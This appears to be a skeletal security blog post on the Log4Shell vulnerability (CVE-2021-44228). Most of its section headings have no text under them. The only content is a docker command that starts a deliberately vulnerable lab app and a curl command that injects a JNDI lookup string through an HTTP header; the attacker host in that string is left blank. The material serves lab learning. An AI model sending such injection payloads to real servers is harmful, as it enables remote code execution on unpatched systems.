[AppSec] Log4Shell (CVE-2021–44228)

Source: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

What is Log4J?

Why is it critical?

What is the vulnerability?

How to identify the vulnerability?

How to mitigate?

Detecting PoC:

Exploit PoC:

RCE Payload PoC:

Log4Shell WAF Bypass:

Labs / Vulnerable App:

# Running the server
docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
# Exploit
curl -H 'X-Api-Version: ${jndi:ldap://}'




OSWE | OSCE | OSCP | CREST | Lead Offensive Security Engineer